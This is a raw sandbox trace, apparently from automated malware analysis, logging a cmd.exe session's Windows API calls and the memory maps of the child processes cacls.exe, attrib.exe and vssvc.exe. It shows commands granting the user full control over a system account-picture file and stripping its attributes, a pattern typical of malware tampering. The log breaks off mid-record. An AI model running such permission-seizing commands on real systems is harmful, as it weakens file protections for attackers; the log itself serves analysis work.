[0180.231] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0180.231] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0180.231] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0180.231] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0180.231] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0180.231] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0180.232] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0180.232] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0180.232] _wcsicmp (_String1="CACLS", _String2="IF") returned -6 [0180.232] _wcsicmp (_String1="CACLS", _String2="REM") returned -15 [0180.232] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0180.232] SetErrorMode (uMode=0x0) returned 0x0 [0180.232] SetErrorMode (uMode=0x1) returned 0x0 [0180.232] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x301e98, lpFilePart=0x24f4dc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x24f4dc*="Desktop") returned 0x18 [0180.232] SetErrorMode (uMode=0x0) returned 0x1 [0180.232] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0180.232] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0180.238] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0180.238] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x24f258, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f258) returned 0xffffffff [0180.239] GetLastError () returned 0x2 [0180.239] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x24f258, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f258) returned 0xffffffff [0180.239] GetLastError () returned 0x2 [0180.239] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x24f258, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f258) returned 0x302180 [0180.239] FindClose (in: hFindFile=0x302180 | out: hFindFile=0x302180) returned 1 [0180.239] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x24f258, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f258) returned 0xffffffff [0180.239] GetLastError () returned 0x2 [0180.239] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x24f258, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f258) returned 0x302180 [0180.239] FindClose (in: hFindFile=0x302180 | out: hFindFile=0x302180) returned 1 [0180.240] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0180.240] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0180.240] GetConsoleTitleW (in: lpConsoleTitle=0x24f750, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0180.240] InitializeProcThreadAttributeList (in: lpAttributeList=0x24f5d8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x24f6a0 | out: lpAttributeList=0x24f5d8, lpSize=0x24f6a0) returned 1 [0180.240] UpdateProcThreadAttribute (in: lpAttributeList=0x24f5d8, dwFlags=0x0, Attribute=0x60001, lpValue=0x24f698, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x24f5d8, lpPreviousValue=0x0) returned 1 [0180.240] GetStartupInfoW (in: lpStartupInfo=0x24f594 | out: lpStartupInfo=0x24f594*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0180.240] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0180.241] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x24f634*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x24f680 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x24f680*(hProcess=0x50, hThread=0x4c, dwProcessId=0x67c, dwThreadId=0x188)) returned 1 [0180.243] CloseHandle (hObject=0x4c) returned 1 [0180.243] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0180.243] GetEnvironmentStringsW () returned 0x300308* [0180.243] FreeEnvironmentStringsW (penv=0x300308) returned 1 [0180.243] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0180.443] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x24f574 | out: lpExitCode=0x24f574*=0x0) returned 1 [0180.443] CloseHandle (hObject=0x50) returned 1 [0180.443] _vsnwprintf (in: _Buffer=0x24f6bc, _BufferCount=0x13, _Format="%08X", _ArgList=0x24f580 | out: _Buffer="00000000") returned 8 [0180.443] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0180.443] GetEnvironmentStringsW () returned 0x302410* [0180.444] FreeEnvironmentStringsW (penv=0x302410) returned 1 [0180.444] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0180.444] GetEnvironmentStringsW () returned 0x302410* [0180.444] FreeEnvironmentStringsW (penv=0x302410) returned 1 [0180.444] DeleteProcThreadAttributeList (in: lpAttributeList=0x24f5d8 | out: lpAttributeList=0x24f5d8) [0180.444] GetConsoleTitleW (in: lpConsoleTitle=0x24f9bc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0180.444] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0180.444] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0180.444] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0180.444] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x24f258, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f258) returned 0xffffffff [0180.445] GetLastError () returned 0x2 [0180.445] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x24f258, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f258) returned 0xffffffff [0180.445] GetLastError () returned 0x2 [0180.445] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x24f258, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f258) returned 0x2fe4d8 [0180.445] FindClose (in: hFindFile=0x2fe4d8 | out: hFindFile=0x2fe4d8) returned 1 [0180.445] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x24f258, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f258) returned 0xffffffff [0180.445] GetLastError () returned 0x2 [0180.446] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x24f258, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f258) returned 0x2fe4d8 [0180.446] FindClose (in: hFindFile=0x2fe4d8 | out: hFindFile=0x2fe4d8) returned 1 [0180.446] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0180.446] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0180.446] GetConsoleTitleW (in: lpConsoleTitle=0x24f750, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0180.446] InitializeProcThreadAttributeList (in: lpAttributeList=0x24f5d8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x24f6a0 | out: lpAttributeList=0x24f5d8, lpSize=0x24f6a0) returned 1 [0180.446] UpdateProcThreadAttribute (in: lpAttributeList=0x24f5d8, dwFlags=0x0, Attribute=0x60001, lpValue=0x24f698, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x24f5d8, lpPreviousValue=0x0) returned 1 [0180.446] GetStartupInfoW (in: lpStartupInfo=0x24f594 | out: lpStartupInfo=0x24f594*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0180.446] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0180.446] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x24f634*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x24f680 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp\"", lpProcessInformation=0x24f680*(hProcess=0x4c, hThread=0x50, dwProcessId=0xc74, dwThreadId=0xce0)) returned 1 [0180.448] CloseHandle (hObject=0x50) returned 1 [0180.448] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0180.448] GetEnvironmentStringsW () returned 0x302410* [0180.448] FreeEnvironmentStringsW (penv=0x302410) returned 1 [0180.448] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0180.504] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x24f574 | out: lpExitCode=0x24f574*=0x0) returned 1 [0180.504] CloseHandle (hObject=0x4c) returned 1 [0180.504] _vsnwprintf (in: _Buffer=0x24f6bc, _BufferCount=0x13, _Format="%08X", _ArgList=0x24f580 | out: _Buffer="00000000") returned 8 [0180.504] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0180.504] GetEnvironmentStringsW () returned 0x302410* [0180.504] FreeEnvironmentStringsW (penv=0x302410) returned 1 [0180.504] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0180.504] GetEnvironmentStringsW () returned 0x302410* [0180.504] FreeEnvironmentStringsW (penv=0x302410) returned 1 [0180.505] DeleteProcThreadAttributeList (in: lpAttributeList=0x24f5d8 | out: lpAttributeList=0x24f5d8) [0180.505] _get_osfhandle (_FileHandle=1) returned 0x7 [0180.505] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0180.505] _get_osfhandle (_FileHandle=1) returned 0x7 [0180.505] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0180.505] _get_osfhandle (_FileHandle=0) returned 0x3 [0180.505] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0180.505] SetConsoleInputExeNameW () returned 0x1 [0180.505] GetConsoleOutputCP () returned 0x1b5 [0180.505] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0180.505] SetThreadUILanguage (LangId=0x0) returned 0x409 [0180.505] exit (_Code=0) Process: id = "335" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea16ee0" os_pid = "0x67c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "334" os_parent_pid = "0xcf8" cmd_line = "CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 25165 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 25166 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 25167 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 25168 start_va = 0x190000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 25169 start_va = 0xfa0000 end_va = 0xfa8fff entry_point = 0xfa0000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 25170 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 25171 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 25172 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 25173 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 25174 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 25175 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 25176 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 25177 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 25178 start_va = 0x310000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 25179 start_va = 0x570000 end_va = 0x57ffff entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 25180 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 25181 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 25182 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 25183 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 25184 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 25185 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 25186 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 458 os_tid = 0x188 Thread: id = 459 os_tid = 0xc9c Process: id = "336" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16ee0" os_pid = "0xc74" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "334" os_parent_pid = "0xcf8" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 25187 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 25188 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 25189 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 25190 start_va = 0x150000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 25191 start_va = 0xdd0000 end_va = 0xdd6fff entry_point = 0xdd0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 25192 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 25193 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 25194 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 25195 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 25196 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 25197 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 25198 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 25199 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 25200 start_va = 0x2b0000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 25201 start_va = 0x5a0000 end_va = 0x5affff entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 25202 start_va = 0x6e2a0000 end_va = 0x6e2bcfff entry_point = 0x6e2a0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 25203 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 25204 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 25205 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 25206 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 25207 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 25208 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 25209 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 25210 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 25211 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 25212 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 25213 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 25214 start_va = 0x190000 end_va = 0x257fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 25215 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 25216 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 460 os_tid = 0xce0 Process: id = "337" image_name = "vssvc.exe" filename = "c:\\windows\\system32\\vssvc.exe" page_root = "0x7ea16dc0" os_pid = "0xb88" os_integrity_level = "0x4000" os_privileges = "0xe60b7e890" monitor_reason = "rpc_server" parent_id = "326" os_parent_pid = "0xc24" cmd_line = "C:\\Windows\\system32\\vssvc.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\VSS" [0xe], "NT AUTHORITY\\Logon Session 00000000:0006c0d8" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 25222 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 25223 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 25224 start_va = 0x30000 end_va = 0x6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 25225 start_va = 0x70000 end_va = 0x73fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 25226 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000080000" filename = "" Region: id = 25227 start_va = 0x90000 end_va = 0x91fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000090000" filename = "" Region: id = 25228 start_va = 0xa0000 end_va = 0xb0fff entry_point = 0xa0000 region_type = mapped_file name = "vssvc.exe.mui" filename = "\\Windows\\System32\\en-US\\VSSVC.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\vssvc.exe.mui") Region: id = 25229 start_va = 0xc0000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 25230 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 25231 start_va = 0x1d0000 end_va = 0x236fff entry_point = 0x1d0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 25232 start_va = 0x240000 end_va = 0x307fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000240000" filename = "" Region: id = 25233 start_va = 0x310000 end_va = 0x410fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 25234 start_va = 0x420000 end_va = 0x49ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 25235 start_va = 0x4a0000 end_va = 0x4a0fff entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 25236 start_va = 0x4b0000 end_va = 0x4b0fff entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 25237 start_va = 0x4c0000 end_va = 0x5bffff entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 25238 start_va = 0x5c0000 end_va = 0x5c0fff entry_point = 0x0 region_type 